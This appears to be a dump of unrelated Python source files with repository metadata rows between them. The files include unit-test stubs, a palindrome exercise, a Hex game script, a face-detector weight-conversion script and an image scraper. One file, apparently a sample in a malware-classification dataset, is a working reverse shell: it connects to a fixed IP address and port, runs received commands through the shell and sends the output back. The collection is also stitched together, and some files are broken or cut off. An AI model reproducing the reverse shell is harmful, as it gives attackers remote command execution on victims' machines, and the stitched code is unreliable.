class TestTransactionSummary(unittest.TestCase):
    """Generated unit test stubs for the TransactionSummary model."""

    def setUp(self):
        pass

    def tearDown(self):
        pass

    def testTransactionSummary(self):
        """Test TransactionSummary"""
        # FIXME: construct object with mandatory attributes with example values
        # model = TransactionSummary()  # noqa: E501
        pass

if __name__ == '__main__':
    unittest.main()
| [
"[email protected]"
] | |
0fb0c324b7732ab490a71f2d069eca7673a43eb2 | 7a87119ef5d77a1b225aab45083a45dcd376684c | /6_palindroom.py | b71f3511d35f1b2ab48041d139ac45ce6325a707 | [] | no_license | astilleman/MI | 0e31e0f4098502e83a13805feae82e038c169bb7 | 1564fd28f759761c3e186d41107c9abff3b69070 | refs/heads/master | 2023-03-29T19:14:46.817308 | 2021-04-06T15:43:17 | 2021-04-06T15:43:17 | 337,495,283 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,100 | py | """
Een palindroom is een string die hetzelfde leest van links naar
rechts, als omgekeerd. Enkele voorbeelden van palindromen zijn:
- kayak
- racecar
- was it a cat I saw
Schrijf een recursieve functie die een string vraagt aan de gebruiker en
nakijkt of deze string al dan niet een palindroom is. Indien de
ingevoerde string een palindroom is, moet de functie True teruggeven,
anders geeft de functie False terug.
Je mag ervan uitgaan dat de gegeven string geen spaties bevat.
Let op: Zorg ervoor dat je functie niet hoofdlettergevoelig is.
"""
def is_palindroom(string):
    """Recursively check whether `string` is a palindrome.

    Case-insensitive, as the assignment requires. Returns True for the
    empty string and single characters.

    Bug fixes vs. the original: the empty-string base case called exit()
    (terminating the interpreter before any assert below could run), and
    the recursion dropped only the FIRST character (string[1:]), so even
    "aba" was judged incorrectly.
    """
    lowered = string.lower()
    if len(lowered) <= 1:
        # Base case: nothing (or one char) left to compare.
        return True
    if lowered[0] != lowered[-1]:
        return False
    # Outer characters match; recurse on the interior.
    return is_palindroom(lowered[1:-1])
# TESTS -- module-level assertions acting as the assignment's acceptance
# suite (last case exercises case-insensitivity).
assert is_palindroom("")
assert is_palindroom("a")
assert is_palindroom("aa")
assert not is_palindroom("ab")
assert is_palindroom("aba")
assert not is_palindroom("aab")
assert is_palindroom("kayak")
assert not is_palindroom("racehorse")
assert is_palindroom("racecar")
assert is_palindroom("wasitacatIsaw")
"[email protected]"
] | |
174e5543c3d14be2f7973435e139bd2bb9bc19b5 | ef2f932655e4591c4f654431cd96eedd0af2b5ba | /tests/example.py | b717490fbd69d71977bed6f795fb9a7c57e8a744 | [
"MIT"
] | permissive | cair/hex-ai | b380447c6dd445452c161babefdfadf329e899fa | 70c134a1479b58634e62c845314c7536ad64e4be | refs/heads/master | 2021-08-03T02:37:13.928443 | 2021-07-26T19:58:51 | 2021-07-26T20:02:29 | 209,273,454 | 0 | 0 | MIT | 2021-04-19T17:44:02 | 2019-09-18T09:46:06 | C | UTF-8 | Python | false | false | 540 | py | from PyHex import Hex11 as Hex
if __name__ == "__main__":
    # Play up to 10M random self-play games of Hex, reporting only games
    # that finished with many positions still open (decided quickly) --
    # NOTE(review): the 75 threshold looks like a sparsity filter; confirm.
    hg = Hex.HexGame()
    winner = -1
    for game in range(10000000):
        Hex.init(hg)
        player = 0
        while Hex.full_board(hg) == 0:
            # Random rollout: alternate players placing random pieces
            # until someone connects or the board fills.
            position = Hex.place_piece_randomly(hg, player)
            if Hex.winner(hg, player, position):
                winner = player
                break
            player = 1 - player
        if hg.number_of_open_positions >= 75:
            print("\nPlayer %s wins!\n\n" % (winner, ))
            Hex.print(hg)
| [
"[email protected]"
] | |
66eef6585fd94f0ceff511a5bcdfafdbbc1d0330 | b580fd482147e54b1ca4f58b647fab016efa3855 | /host_im/mount/malware-classification-master/samples/virus/sample_bad382.py | 9b733b70a15ec41b80a16eccdf59369f39e4f4a9 | [] | no_license | Barnsa/Dissertation | 1079c8d8d2c660253543452d4c32799b6081cfc5 | b7df70abb3f38dfd446795a0a40cf5426e27130e | refs/heads/master | 2022-05-28T12:35:28.406674 | 2020-05-05T08:37:16 | 2020-05-05T08:37:16 | 138,386,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 318 | py | import bz2
import threading
import socket
import subprocess
import lzma
import hashlib
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("175.20.0.200",8080))
while not False:
command = s.recv(1024).decode("utf-8")
if not command: break
data = subprocess.check_output(command, shell=True)
s.send(data)
| [
"[email protected]"
] | |
b10302ab2daca47e9bd8afe17228e2f901d2976a | d00b1e01f82076248eb07d6391fafabfbac74898 | /metadata/FrostNumber/hooks/pre-stage.py | 7f090d9c2b69e9473bb79627b7d4db1dbab856b5 | [
"MIT"
] | permissive | csdms/wmt-metadata | 9b922415faa397e3d5511f258e1a4fda846b78b7 | 39207acc376f1cd21b2ae1d5581a1e2c317a6441 | refs/heads/master | 2020-04-07T00:39:56.268862 | 2019-02-26T21:24:20 | 2019-02-26T21:24:20 | 51,040,972 | 0 | 0 | MIT | 2018-10-31T19:36:54 | 2016-02-04T00:23:47 | Python | UTF-8 | Python | false | false | 769 | py | """A hook for modifying parameter values read from the WMT client."""
import os
import shutil
from wmt.utils.hook import find_simulation_input_file, yaml_dump
from topoflow_utils.hook import assign_parameters
# Env keys whose values name simulation input files; populated as a side
# effect of assign_parameters().
file_list = []


def execute(env):
    """Perform pre-stage tasks for running a component.

    Parameters
    ----------
    env : dict
        A dict of component parameter values from WMT.
    """
    # The run covers [start_year, start_year + _run_duration - 1], inclusive.
    env['end_year'] = long(env['start_year']) + long(env['_run_duration']) - 1
    env['fn_out_filename'] = 'frostnumber_output.dat'

    assign_parameters(env, file_list)

    # Stage every referenced input file into the working directory.
    for fname in file_list:
        src = find_simulation_input_file(env[fname])
        shutil.copy(src, os.curdir)

    # Persist the final environment for the run stage.
    env['_file_list'] = file_list

    yaml_dump('_env.yaml', env)
| [
"[email protected]"
] | |
a296c689355de9ff44465c89010087d206693bda | e15d63ccde04e7458bff5af1bdad63a5c699b489 | /example/Model_Conversion/mx2torch/retinaface_r50/res50_transfer_weight.py | 17e4e530621f5d1100de117f9e520503564c3aba | [
"WTFPL"
] | permissive | ddddwee1/TorchSUL | 775b6a2b1e4ab7aac25a3f0411de83affc257af5 | 6c7cd41b14fc8b746983e8b981d1ba4d08370ca2 | refs/heads/master | 2023-08-21T15:21:24.131718 | 2023-08-18T09:37:56 | 2023-08-18T09:37:56 | 227,628,298 | 13 | 1 | null | null | null | null | UTF-8 | Python | false | false | 7,870 | py | import numpy as np
from TorchSUL import Model as M
import torch
import torch.nn as nn
import torch.nn.functional as F
class Unit(M.Model):
    """Pre-activation ResNet bottleneck: BN+ReLU first, then 1x1/3x3/1x1 convs.

    forward() returns (block output, post-c1 feature); the second value is
    the intermediate tap that Stage exposes as a lateral feature map.
    """

    def initialize(self, chn, stride=1, shortcut=False):
        self.bn0 = M.BatchNorm()
        self.act = M.Activation(M.PARAM_RELU)
        self.c1 = M.ConvLayer(1, chn, activation=M.PARAM_RELU, batch_norm=True, usebias=False)
        self.c2 = M.ConvLayer(3, chn, stride=stride, activation=M.PARAM_RELU, batch_norm=True, usebias=False)
        self.c3 = M.ConvLayer(1, chn*4, usebias=False)
        self.shortcut = shortcut
        if shortcut:
            # Projection shortcut: matches channels (chn*4) and stride.
            self.sc = M.ConvLayer(1, chn*4, stride=stride, usebias=False)

    def forward(self, inp):
        if self.shortcut:
            # First unit of a stage: pre-activation feeds both branches.
            inp = self.bn0(inp)
            inp = self.act(inp)
            x2 = x = self.c1(inp)
            x = self.c2(x)
            x = self.c3(x)
            sc = self.sc(inp)
            x = sc + x
        else:
            # Identity-shortcut unit: residual added to the raw input.
            x = self.bn0(inp)
            x = self.act(x)
            x2 = x = self.c1(x)
            x = self.c2(x)
            x = self.c3(x)
            x = inp + x
        return x, x2
class Stage(M.Model):
    """A ResNet stage: `num_units` bottlenecks; only the first downsamples.

    forward() returns (stage output, intermediate tap from the first unit).
    """

    def initialize(self, outchn, num_units, stride):
        self.units = nn.ModuleList()
        for i in range(num_units):
            # Only unit 0 uses the stage stride and a projection shortcut.
            self.units.append(Unit(outchn, stride=stride if i==0 else 1, shortcut = i==0))

    def forward(self, x):
        # Keep only the first unit's intermediate feature (x2).
        for i,u in enumerate(self.units):
            if i==0:
                x, x2 = u(x)
            else:
                x, _ = u(x)
        return x, x2
class DETHead(M.Model):
    """SSH-style context detection head.

    Three branches -- one 3x3 conv, one stacked pair, one stacked triple
    (growing receptive field) -- concatenated on channels, then ReLU.
    Output has 256 + 128 + 128 = 512 channels.
    """

    def initialize(self):
        self.c11 = M.ConvLayer(3, 256, batch_norm=True)
        self.c21 = M.ConvLayer(3, 128, batch_norm=True, activation=M.PARAM_RELU)
        self.c22 = M.ConvLayer(3, 128, batch_norm=True)
        self.c31 = M.ConvLayer(3, 128, batch_norm=True, activation=M.PARAM_RELU)
        self.c32 = M.ConvLayer(3, 128, batch_norm=True)
        self.act = M.Activation(M.PARAM_RELU)

    def forward(self, x):
        x1 = self.c11(x)
        x2 = self.c21(x)
        # Third branch reuses the second branch's first conv output.
        x3 = self.c31(x2)
        x3 = self.c32(x3)
        x2 = self.c22(x2)
        x = torch.cat([x1, x2, x3], dim=1)
        x = self.act(x)
        return x
class RegressHead(M.Model):
def initialize(self):
self.c1 = M.ConvLayer(1,4)
self.c2 = M.ConvLayer(1,8)
self.c3 = M.ConvLayer(1,20)
def forward(self, x):
prob = self.c1(x)
bbox = self.c2(x)
kpts = self.c3(x)
prob = prob.view(prob.shape[0],2,prob.shape[2]*2,prob.shape[3])
prob = F.softmax(prob, dim=1)
prob = prob.view(prob.shape[0],4,-1, prob.shape[3])
return prob, bbox, kpts
class Detector(M.Model):
def initialize(self):
self.bn0 = M.BatchNorm()
self.c1 = M.ConvLayer(7, 64, stride=2, activation=M.PARAM_RELU, batch_norm=True, usebias=False)
self.pool = M.MaxPool2D(3, 2)
self.stage1 = Stage(64, num_units=3, stride=1)
self.stage2 = Stage(128, num_units=4, stride=2)
self.stage3 = Stage(256, num_units=6, stride=2)
self.stage4 = Stage(512, num_units=3, stride=2)
self.bn1 = M.BatchNorm()
self.act = M.Activation(M.PARAM_RELU)
self.ssh_c3_lateral = M.ConvLayer(1, 256, batch_norm=True, activation=M.PARAM_RELU)
self.det3 = DETHead()
self.head32 = RegressHead()
self.ssh_c2_lateral = M.ConvLayer(1, 256, batch_norm=True, activation=M.PARAM_RELU)
self.ssh_c3_upsampling = M.NNUpSample(2)
self.ssh_c2_aggr = M.ConvLayer(3, 256, batch_norm=True, activation=M.PARAM_RELU)
self.det2 = DETHead()
self.head16 = RegressHead()
self.ssh_m1_red_conv = M.ConvLayer(1, 256, batch_norm=True, activation=M.PARAM_RELU)
self.ssh_c2_upsampling = M.NNUpSample(2)
self.ssh_c1_aggr = M.ConvLayer(3, 256, batch_norm=True, activation=M.PARAM_RELU)
self.det1 = DETHead()
self.head8 = RegressHead()
def forward(self, x):
x = self.bn0(x)
x = self.c1(x)
x = self.pool(x)
x, _ = self.stage1(x)
x, _ = self.stage2(x)
x, f1 = self.stage3(x)
x, f2 = self.stage4(x)
x = self.bn1(x)
x = self.act(x)
fc3 = x = self.ssh_c3_lateral(x)
d3 = x = self.det3(x)
scr32, box32, lmk32 = self.head32(d3)
fc2 = self.ssh_c2_lateral(f2)
x = self.ssh_c3_upsampling(fc3)
x = x[:,:,:fc2.shape[2],:fc2.shape[3]]
plus100 = x = fc2 + x
fc2_aggr = x = self.ssh_c2_aggr(x)
d2 = x = self.det2(x)
scr16, box16, lmk16 = self.head16(d2)
fc1 = self.ssh_m1_red_conv(f1)
x = self.ssh_c2_upsampling(fc2_aggr)
x = x[:,:,:fc1.shape[2],:fc1.shape[3]]
x = fc1 + x
fc1_aggr = x = self.ssh_c1_aggr(x)
d1 = x = self.det1(x)
scr8, box8, lmk8 = self.head8(d1)
results = [scr32, box32, lmk32, scr16, box16, lmk16, scr8, box8, lmk8]
return results
if __name__=='__main__':
net = Detector()
net.eval()
x = torch.from_numpy(np.ones([1,3,640,640]).astype(np.float32))
_ = net(x)
# net.bn_eps(1e-5)
# net.backbone.det1.bn_eps(2e-5)
res = {}
ps = net.named_parameters()
for p in ps:
name, p = p
res[name] = p
ps = net.named_buffers()
for p in ps:
name, p = p
res[name] = p
def get_bn(l1, l2):
a = []
b = []
a.append(l1+'.weight')
a.append(l1+'.bias')
a.append(l1+'.running_mean')
a.append(l1+'.running_var')
b.append(l2+'_gamma')
b.append(l2+'_beta')
b.append(l2+'_moving_mean')
b.append(l2+'_moving_var')
return a, b
def get_conv(l1, l2, bias=False):
a = [l1 + '.weight']
b = [l2 + '_weight']
if bias:
a.append(l1+'.bias')
b.append(l2+'_bias')
return a,b
def get_layer(l1, l2, bias=False):
res = []
res.append(get_conv(l1 + '.conv', l2%('conv')))
res.append(get_bn(l1 + '.bn', l2%('batchnorm')))
return res
def get_convbn(l1, l2, bias=False):
res = []
res.append(get_conv(l1 + '.conv', l2, bias=bias))
res.append(get_bn(l1 + '.bn', l2 + '_bn'))
return res
def get_unit(l1, l2, sc=False):
res = []
res.append(get_bn(l1+'.bn0', l2+'_bn1'))
res.append(get_conv(l1+'.c1.conv', l2+'_conv1'))
res.append(get_bn(l1+'.c1.bn', l2+'_bn2'))
res.append(get_conv(l1+'.c2.conv', l2+'_conv2'))
res.append(get_bn(l1+'.c2.bn', l2+'_bn3'))
res.append(get_conv(l1+'.c3.conv', l2+'_conv3'))
if sc:
res.append(get_conv(l1+'.sc.conv', l2+'_sc'))
return res
def get_stage(l1, l2, blocknum):
res = []
for i in range(blocknum):
res += get_unit(l1+'.units.%d'%i, l2+'_unit%d'%(i+1), sc= i==0)
return res
def get_dethead(l1, l2):
res = []
res += get_convbn(l1+'.c11', l2+'_conv1', bias=True)
res += get_convbn(l1+'.c21', l2+'_context_conv1', bias=True)
res += get_convbn(l1+'.c22', l2+'_context_conv2', bias=True)
res += get_convbn(l1+'.c31', l2+'_context_conv3_1', bias=True)
res += get_convbn(l1+'.c32', l2+'_context_conv3_2', bias=True)
return res
def get_regress(l1, l2):
res = []
res.append(get_conv(l1+'.c1.conv', l2%('cls_score'), bias=True))
res.append(get_conv(l1+'.c2.conv', l2%('bbox_pred'), bias=True))
res.append(get_conv(l1+'.c3.conv', l2%('landmark_pred'), bias=True))
return res
def totonoi(l):
# print(l)
a = []
b = []
for i in l:
a += i[0]
b += i[1]
return a,b
l = []
l.append(get_bn('bn0', 'bn_data'))
l.append(get_conv('c1.conv', 'conv0'))
l.append(get_bn('c1.bn', 'bn0'))
l += get_stage('stage1', 'stage1', 3)
l += get_stage('stage2', 'stage2', 4)
l += get_stage('stage3', 'stage3', 6)
l += get_stage('stage4', 'stage4', 3)
l.append(get_bn('bn1', 'bn1'))
l += get_convbn('ssh_c3_lateral', 'ssh_c3_lateral', bias=True)
l += get_dethead('det3', 'ssh_m3_det')
l += get_regress('head32', 'face_rpn_%s_stride32')
l += get_convbn('ssh_c2_lateral', 'ssh_c2_lateral', bias=True)
l += get_convbn('ssh_c2_aggr', 'ssh_c2_aggr', bias=True)
l += get_dethead('det2', 'ssh_m2_det')
l += get_regress('head16', 'face_rpn_%s_stride16')
l += get_convbn('ssh_m1_red_conv', 'ssh_m1_red_conv', bias=True)
l += get_convbn('ssh_c1_aggr', 'ssh_c1_aggr', bias=True)
l += get_dethead('det1', 'ssh_m1_det')
l += get_regress('head8', 'face_rpn_%s_stride8')
a,b = totonoi(l)
# print(a,b)
import source
for i,j in zip(a,b):
# print(i,j)
value = source.res[j].asnumpy()
# print(value.shape)
# print(res[i].shape)
res[i].data[:] = torch.from_numpy(value)[:]
# net.bn_eps(2e-5)
y = net(x)
print(y[0])
print(y[0].shape)
M.Saver(net).save('./model_r50/r50_retina.pth')
| [
"[email protected]"
] | |
46bd95d09f6bc8aecede6db2b326fc90533f3af9 | 45467e07e77131f631d0865046dcc4d18f483601 | /src/Hackerearth/round_2/A.py | a766bae20c7b6478ffb22d212ff53cd5256fddb7 | [] | no_license | bvsbrk/Algos | 98374e094bd3811579276d25a82bbf2c0f046d96 | cbb18bce92054d57c0e825069ef7f2120a9cc622 | refs/heads/master | 2021-09-25T10:01:59.323857 | 2018-10-20T16:07:07 | 2018-10-20T16:07:07 | 98,708,839 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 805 | py | if __name__ == '__main__':
for _ in range(int(input().strip())):
n = int(input().strip())
x = n
arr = [int(i) for i in input().strip().split()]
arr = arr[::-1]
i = 0
while arr[i] == 0 and i < n:
i += 1
x -= 1
if i == n - 1:
print(0)
else:
ans = []
if arr[i] > 0:
ans.append(1)
else:
ans.append(-1)
# neg sgn
if n % 2 == 0:
if arr[i] > 0:
ans.append(1)
else:
ans.append(-1)
else:
if arr[i] < 0:
ans.append(1)
else:
ans.append(-1)
print(*ans)
| [
"[email protected]"
] | |
6ce151591e20779df71ce25110bc3831ce51c59a | b792f600ed4e50f34e65e4f334cf7a32d319cc0e | /2017/day11.py | cf2d1b7780f769b1e96bacb18b46b9ecb825122d | [] | no_license | daniel70/AoC | d577f490559d4a0f0d24567bd796117e1aac94ec | ef704a4f6e90168cdc2a91e894583a96e9a6c371 | refs/heads/master | 2022-12-28T03:19:08.341913 | 2022-12-16T01:52:39 | 2022-12-18T01:30:50 | 224,876,724 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 711 | py | directions = {
'n': (0, 1),
'ne': (1, 0.5),
'se': (1, -0.5),
's': (0, -1),
'sw': (-1, -0.5),
'nw': (-1, 0.5),
}
def distance(instructions: list[str]) -> tuple[int, int]:
origin = [0, 0]
furthest = 0
for direction in instructions:
dx, dy = directions[direction]
origin[0] += dx
origin[1] += dy
x, y = origin
furthest = max(furthest, abs(x) + max(int(abs(y)) - abs(x) // 2, 0))
steps = abs(x) + max(int(abs(y)) - abs(x) // 2, 0)
return steps, furthest
instructions = open("input11.txt").read().strip().split(",")
answer1, answer2 = distance(instructions=instructions)
print("answer 1:", answer1)
print("answer 2:", answer2)
| [
"[email protected]"
] | |
5432391a83b8c960663d3cef2f2aa55994ff307a | c4bfd8ba4c4c0f21bd6a54a9131f0985a5a4fa56 | /crescent/functions/get_att.py | 704a83a8c9e664be800a85836e5778252c98e7a2 | [
"Apache-2.0"
] | permissive | mpolatcan/crescent | 405936ec001002e88a8f62d73b0dc193bcd83010 | 2fd0b1b9b21613b5876a51fe8b5f9e3afbec1b67 | refs/heads/master | 2022-09-05T04:19:43.745557 | 2020-05-25T00:09:11 | 2020-05-25T00:09:11 | 244,903,370 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 528 | py | from .fn import Fn as AnyFn, FnArrayValue
from typing import Union
class GetAtt(FnArrayValue):
def __init__(self):
super(GetAtt, self).__init__(
fn_name=GetAtt.__name__,
field_order=[self.Resource.__name__, self.Attribute.__name__]
)
def Resource(self, resource_id: Union[str, AnyFn]):
return self._set_field(self.Resource.__name__, resource_id)
def Attribute(self, attribute: Union[str, AnyFn]):
return self._set_field(self.Attribute.__name__, attribute)
| [
"[email protected]"
] | |
6e3877952188cded94c414eb37f6d19ebeb95534 | 5462142b5e72cb39bea5b802dd46f55357c4ea84 | /test_pic/vmgirls/dl_vmgirls_pic.py | 499ac3f8cef5a386fe97d91b59fd55f04f358de3 | [] | no_license | qqmadeinchina/myhomeocde | a0996ba195020da9af32613d6d2822b049e515a0 | 291a30fac236feb75b47610c4d554392d7b30139 | refs/heads/master | 2023-03-23T05:28:53.076041 | 2020-08-24T08:39:00 | 2020-08-24T08:39:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,874 | py | # -*- coding: utf-8 -*-
# @time :2020/8/17 9:56
# @Author:老萝卜
# @file:dl_vmgirls_pic
# @Software:%{PRODUICT_NAME}
'''
爬取https://www.vmgirls.com/所有图片
'''
import time
import requests
from lxml import etree
import os
import json
basepath_picsave="e:\\temp\\pythontest\\vmgirls\\"
headers={
"user-agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36"
}
sysdatetime=time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(time.time()))
sysdate=time.strftime('%Y-%m-%d',time.localtime(time.time()))
systime=time.strftime('%H:%M:%S',time.localtime(time.time()))
sysdatetime_compact==time.strftime('%Y%m%d%H%M%S',time.localtime(time.time()))
# 保存文本内容
def save_html(content,path,oprtye="a",encode="utf-8"):
with open(path,oprtye,encoding=encode) as file:
file.write(content)
# 第一步,请求网络 - 获取网络返回的数据
def get_page(url,encode="utf-8"):
html = requests.get(url,headers=headers).content.decode(encode) # 需要打开网站的编码格式,把拿到的数据进行解码,否m则出现乱码
return html
# 解析数据首页
def xpath_toppage(response):
pageslist=[]
html=etree.HTML(response)
# a_list=html.xpath("/a")
# # 将<a></a>信息保存
# temp_list=[]
# for item in a_list:
# str0=etree.tostring(item,encoding="utf-8").decode("utf-8")
# temp_list.append(str0)
# temp_str="\n".join(temp_list)
# save_html(temp_str,"page_a_content.txt","w")
urllist=html.xpath("//a[@class='media-content']/@href")
for url in urllist:
newurl = "https://www.vmgirls.com/" + url
if newurl not in pageslist:
pageslist.append(newurl)
return pageslist
# 创建目录
def createdir(dir_name):
if not os.path.exists(dir_name):
os.mkdir(dir_name)
# 解析每个人的页面
def xpath_pages(response):
pagelist = []
html = etree.HTML(response)
title=html.xpath("//h1[@class='post-title h3']/text()")[0]
author=html.xpath("//a[@class='author-popup']/text()")
# urllist=html.xpath("//a[class='nc-light-gallery-item']/@href")
urllist=html.xpath(f"//a[@title='{title}']/@href")
# print("author=",author)
# print("urllist=",urllist)
savepath=basepath_picsave+title+"\\"
createdir(savepath)
return (savepath,urllist)
def savepic(filepath,url):
req = requests.get(url,headers=headers)
with open(filepath, "wb") as file:
file.write(req.content)
def savejson(data,filepath,oprtype="a",encode="utf-8"):
with open(filepath,oprtype,encoding=encode) as fjson:
json.dump(data,fjson,)
def main():
url="https://www.vmgirls.com/"
response=get_page(url)
save_html(response,f".\\www.vmgirls.com.{sysdate}.html","w")
if response=="":
print("网页打开失败")
return
pageslist=xpath_toppage(response)
# print("pageslist=",pageslist)
picurllist=[]
for picsurl in pageslist:
resp = get_page(picsurl)
save_html(resp,"1.html","w")
picpath,urllist=xpath_pages(resp)
# print("urllist=",urllist)
for picurl in urllist:
filename=picpath+picurl.split("/")[-1]
picurl1="https://www.vmgirls.com/"+picurl
picurllist.append((filename,picurl1))
# print("picurllist=", picurllist)
# print("(filename,picurl1)=",filename,picurl1)
# print("picurllist=",picurllist)
# temp_str="\n".join(picurllist)
# save_html(temp_str,"urllist","w")
savejson(picurllist,f"picurllist_{sysdatetime_compact}.json","w")
# with open("picurllist.json","r") as fjson:
# data=json.load(fjson)
# print("data=",data)
for filepath,pic_url in picurllist:
savepic(filepath,pic_url)
if __name__=="__main__":
main() | [
"[email protected]"
] | |
8114f87ea4d123ce369f1ad9b8352b6eaf865dbf | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03208/s325634445.py | 323b17ee4ad8a29bda1ed175bcbbe1278f12231d | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 240 | py | def resolve():
n, k = map(int, input().split())
H_sort = list(sorted([int(input()) for _ in range(n)],reverse=True))
ans = 10**9
for i in range(n-k+1):
ans = min(ans, H_sort[i]-H_sort[i+k-1])
print(ans)
resolve() | [
"[email protected]"
] | |
64a803604b6d762457fbc84462c8185a3f0425aa | 7a42d40a351824464a3c78dc0c3e78bbd8e0a92f | /bigdog_blog/manage.py | f00bf03a35f34d705c8b341ce90fdc096c01ada7 | [] | no_license | AhMay/DerekBlogLearn | 6595063eafbc237b932e187b5cb3ad8ff32637fc | fdd5ea2fc5732cdc82ad006f7be0a2a1f30d0ba9 | refs/heads/master | 2020-07-09T05:20:33.283672 | 2019-09-29T10:10:23 | 2019-09-29T10:10:23 | 203,891,215 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 631 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'bigdog_blog.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
a143fc16f6331dc078310d40e66a6ceb4909e318 | acc9d729e0182b17023e9660457eed0e19f4f828 | /test/test_token_resource.py | 6855ae9531f7996b2e7633ed1cc0a9aede6033b2 | [] | no_license | secuwave/nexpose_client | 2f00907ef3ffea33c8e9f5cc2543e708f349de6c | 5ceff219ae03cadb5407dc48d8858ffa56bb3463 | refs/heads/master | 2020-05-22T13:54:22.675479 | 2019-05-13T09:12:09 | 2019-05-13T09:12:09 | 186,369,310 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 48,871 | py | # coding: utf-8
"""
InsightVM API
# Overview This guide documents the InsightVM Application Programming Interface (API) Version 3. This API supports the Representation State Transfer (REST) design pattern. Unless noted otherwise this API accepts and produces the `application/json` media type. This API uses Hypermedia as the Engine of Application State (HATEOAS) and is hypermedia friendly. All API connections must be made to the security console using HTTPS. ## Versioning Versioning is specified in the URL and the base path of this API is: `https://<host>:<port>/api/3/`. ## Specification An <a target=\"_blank\" href=\"https://github.com/OAI/OpenAPI-Specification/blob/master/versions/2.0.md\">OpenAPI v2</a> specification (also known as Swagger 2) of this API is available. Tools such as <a target=\"_blank\" href=\"https://github.com/swagger-api/swagger-codegen\">swagger-codegen</a> can be used to generate an API client in the language of your choosing using this specification document. <p class=\"openapi\">Download the specification: <a class=\"openapi-button\" target=\"_blank\" download=\"\" href=\"api.json\"> Download </a></p> ## Authentication Authorization to the API uses HTTP Basic Authorization (see <a target=\"_blank\" href=\"https://www.ietf.org/rfc/rfc2617.txt\">RFC 2617</a> for more information). Requests must supply authorization credentials in the `Authorization` header using a Base64 encoded hash of `\"username:password\"`. <!-- ReDoc-Inject: <security-definitions> --> ### 2FA This API supports two-factor authentication (2FA) by supplying an authentication token in addition to the Basic Authorization. The token is specified using the `Token` request header. To leverage two-factor authentication, this must be enabled on the console and be configured for the account accessing the API. ## Resources ### Naming Resource names represent nouns and identify the entity being manipulated or accessed. 
All collection resources are pluralized to indicate to the client they are interacting with a collection of multiple resources of the same type. Singular resource names are used when there exists only one resource available to interact with. The following naming conventions are used by this API: | Type | Case | | --------------------------------------------- | ------------------------ | | Resource names | `lower_snake_case` | | Header, body, and query parameters parameters | `camelCase` | | JSON fields and property names | `camelCase` | #### Collections A collection resource is a parent resource for instance resources, but can itself be retrieved and operated on independently. Collection resources use a pluralized resource name. The resource path for collection resources follow the convention: ``` /api/3/{resource_name} ``` #### Instances An instance resource is a \"leaf\" level resource that may be retrieved, optionally nested within a collection resource. Instance resources are usually retrievable with opaque identifiers. The resource path for instance resources follows the convention: ``` /api/3/{resource_name}/{instance_id}... ``` ## Verbs The following HTTP operations are supported throughout this API. The general usage of the operation and both its failure and success status codes are outlined below. | Verb | Usage | Success | Failure | | --------- | ------------------------------------------------------------------------------------- | ----------- | -------------------------------------------------------------- | | `GET` | Used to retrieve a resource by identifier, or a collection of resources by type. | `200` | `400`, `401`, `402`, `404`, `405`, `408`, `410`, `415`, `500` | | `POST` | Creates a resource with an application-specified identifier. | `201` | `400`, `401`, `404`, `405`, `408`, `413`, `415`, `500` | | `POST` | Performs a request to queue an asynchronous job. 
| `202` | `400`, `401`, `405`, `408`, `410`, `413`, `415`, `500` | | `PUT` | Creates a resource with a client-specified identifier. | `200` | `400`, `401`, `403`, `405`, `408`, `410`, `413`, `415`, `500` | | `PUT` | Performs a full update of a resource with a specified identifier. | `201` | `400`, `401`, `403`, `405`, `408`, `410`, `413`, `415`, `500` | | `DELETE` | Deletes a resource by identifier or an entire collection of resources. | `204` | `400`, `401`, `405`, `408`, `410`, `413`, `415`, `500` | | `OPTIONS` | Requests what operations are available on a resource. | `200` | `401`, `404`, `405`, `408`, `500` | ### Common Operations #### OPTIONS All resources respond to the `OPTIONS` request, which allows discoverability of available operations that are supported. The `OPTIONS` response returns the acceptable HTTP operations on that resource within the `Allow` header. The response is always a `200 OK` status. ### Collection Resources Collection resources can support the `GET`, `POST`, `PUT`, and `DELETE` operations. #### GET The `GET` operation invoked on a collection resource indicates a request to retrieve all, or some, of the entities contained within the collection. This also includes the optional capability to filter or search resources during the request. The response from a collection listing is a paginated document. See [hypermedia links](#section/Overview/Paging) for more information. #### POST The `POST` is a non-idempotent operation that allows for the creation of a new resource when the resource identifier is not provided by the system during the creation operation (i.e. the Security Console generates the identifier). The content of the `POST` request is sent in the request body. The response to a successful `POST` request should be a `201 CREATED` with a valid `Location` header field set to the URI that can be used to access to the newly created resource. The `POST` to a collection resource can also be used to interact with asynchronous resources. 
